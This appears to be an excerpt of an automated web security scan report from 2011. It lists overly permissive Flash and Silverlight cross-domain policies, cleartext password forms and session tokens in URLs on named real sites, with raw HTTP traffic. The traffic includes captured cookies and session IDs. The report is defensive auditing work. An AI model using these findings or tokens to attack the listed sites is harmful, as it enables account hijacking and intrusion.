The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 03:46:12 GMT
Expires: Fri, 13 May 2011 03:46:12 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 34981
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.32. http://services.digg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://services.digg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: services.digg.com

Response

HTTP/1.0 200 OK
Connection: Keep-Alive
Etag: "de82c156de1cf394d6473937a6097bac9606d89d"
Content-Type: text/x-cross-domain-policy
Content-Length: 359
Server: TornadoServer/0.1

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.widgetserver.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.widgetbox.com" secure="false" />
...[SNIP]...

3.33. http://static.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.186
Date: Thu, 12 May 2011 13:28:56 GMT
Content-Length: 1473
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.34. http://tags.gawker.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.gawker.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.gawker.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Thu, 12 May 2011 13:28:32 GMT
ETag: "5a10ad-424-4a1fd0c3d89c0"
GawkerApplication: ganja
GawkerApplicationHost: Ganja
GawkerHost: GM68 - Request took D=2339 at t=1305206912838152 on site fetch.gawker.com (live)
Last-Modified: Thu, 28 Apr 2011 16:28:31 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Server: Apache
X-Cookie-Set: 0
Content-Length: 1060
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="gawker.com" />
   <allow-access-from domain="*.gawker.com" />
   <allow-access-from domain="*.gawkerassets.com" />
   <allow-access-from domain="now.sprint.com" />
   <allow-access-from domain="*.chartbeat.com" />
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dartmotif.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.gstatic.com" secure="false"/>
...[SNIP]...

3.35. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.27.47.102
Connection: close
Content-Length: 1473

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.36. http://www.stumbleupon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.stumbleupon.com

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Mon, 18 Oct 2010 23:13:29 GMT
Content-Type: application/xml
Content-Length: 460
Date: Thu, 12 May 2011 13:29:34 GMT
Age: 0
Via: 1.1 varnish
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
   <allow-access-from domain="cdn.stumble-upon.com" />
...[SNIP]...

3.37. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:29:28 GMT
Server: Apache
Last-Modified: Thu, 02 Sep 2010 06:29:07 GMT
ETag: "132-48f40ee6332c0"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

3.38. http://www.zdnet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:55 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 1032
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.builder.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.eyewonder.com" />
<allow-access-from domain="*.eyewonderlabs.com" />
...[SNIP]...

4. Silverlight cross-domain policy  previous  next
There are 5 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


4.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Thu, 12 May 2011 13:27:56 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.2. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Thu, 12 May 2011 13:28:00 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

4.3. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:27:54 GMT
Date: Thu, 12 May 2011 13:27:54 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.4. http://b.voicefive.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Fri, 13 May 2011 13:30:29 GMT
Date: Thu, 12 May 2011 13:30:29 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

4.5. http://cdn.eyewonder.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "a683d7574fd1ca1:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 13:30:36 GMT
Last-Modified: Thu, 01 Apr 2010 03:56:43 GMT
Expires: Thu, 12 May 2011 14:30:33 GMT
Content-Length: 268
Connection: close

<?xml version="1.0" encoding="utf-8"?><access-policy><cross-domain-access><policy><allow-from http-request-headers="*"><domain uri="http://*"/></allow-from><grant-to><resource path="/" include-subpath
...[SNIP]...

5. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


5.1. http://crenk.com/buy-chromebook/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://crenk.com
Path:   /buy-chromebook/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /buy-chromebook/ HTTP/1.1
Host: crenk.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, max-age=0
Content-Type: text/html;charset=UTF-8
Date: Thu, 12 May 2011 13:28:15 GMT
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: X-Mapping-abiknkkh=75C39A4651C979FD891E62C62122775E; path=/
Last-Modified: Thu, 12 May 2011 10:10:43 +0000
Content-Length: 32569

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</p>

       <form name="login-form" id="sidebar-login-form" class="standard-form" action="http://crenk.com/wp-login.php" method="post">
           <label>
...[SNIP]...
<br />
           <input type="password" name="pwd" id="sidebar-user-pass" class="input" value="" tabindex="98" /></label>
...[SNIP]...

5.2. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
</p>

       <form action="/comments/post/" method="post" class="submit_form default_form submit_comment_form">
           

                                       <p>
...[SNIP]...
</span><input type="password" name="password" id="id_password" /></label>
...[SNIP]...

5.3. http://www.courierpress.com/news/2011/may/12/heder-here-in-this-spp-ppppp/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.courierpress.com
Path:   /news/2011/may/12/heder-here-in-this-spp-ppppp/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /news/2011/may/12/heder-here-in-this-spp-ppppp/ HTTP/1.1
Host: www.courierpress.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:49 GMT
Server: Apache/2.2.3 (Red Hat)
Vary: Cookie,Accept-Encoding
X-LiveStats-Count: False
Content-Type: text/html; charset=utf-8
X-Varnish: 1531074064
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Connection: close
Content-Length: 104622

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<div class="submit_form_alerts_global">
                           <form action="/accounts/login/?next=/news/2011/may/12/heder-here-in-this-spp-ppppp/" method="post" id="loginform1">                    
                               <div class="global_login_container_left">
...[SNIP]...
</label>
                                           
                                           <input id="global_password" class="vPasswordField required" name="password" size="17" value="" maxlength="30" def="" type="password" style="margin-top:12px;"/>
                                           
                                           <span class="global_formtip">
...[SNIP]...

5.4. http://www.pcworld.com/pcworldconnect/comment_registration  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

POST /pcworldconnect/comment_registration HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/227430/chrome_os_will_likely_include_netflix_support.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26DA3ECF051D0C7D-400001086000024E[CE]; __utma=205278865.1910705707.1303674274.1305051777.1305206882.3; __utmb=205278865; __utmc=205278865; pcw.last_uri=/article/227430/chrome_os_will_likely_include_netflix_support.html; JSESSIONID=41732781CC4F99C762F0377664240A50; fsr.a=1305206922003; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 111

callingurl=http%3A%2F%2Fwww.pcworld.com%2Farticle%2F227430%2Fchrome_os_will_likely_include_netflix_support.html

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:38 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=A582A284CD97C03D88D1B381CBB00A78; Path=/
Vary: Accept-Encoding
Content-Length: 6223


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<div id="regCommentFormContents">
<form id="comregForm" action="/pcworldconnect/comment_registration" class="commentForm rego_signin active">
<input type="hidden" id="init" name="init" value="inited" />
...[SNIP]...
</label><input type="password" name="password" class="formField" value=""></li>
...[SNIP]...
</label><input type="password" name="confirm" class="formField" value=""></li>
...[SNIP]...

6. Session token in URL  previous  next
There are 4 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


6.1. http://l.sharethis.com/pview  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://l.sharethis.com
Path:   /pview

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /pview?event=pview&publisher=f06dc602-68df-478f-8a38-f177716586cf&hostname=mashable.com&location=%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&url=http%3A%2F%2Fmashable.com%2F2011%2F05%2F11%2Fgoogle-chrome-notebooks%2F&sessionID=1305206945034.27371&fpc=6f9c964-12fe465750b-2748d999-1&ts1305206987382.0&r_sessionID=&hash_flag=&shr=&count=1 HTTP/1.1
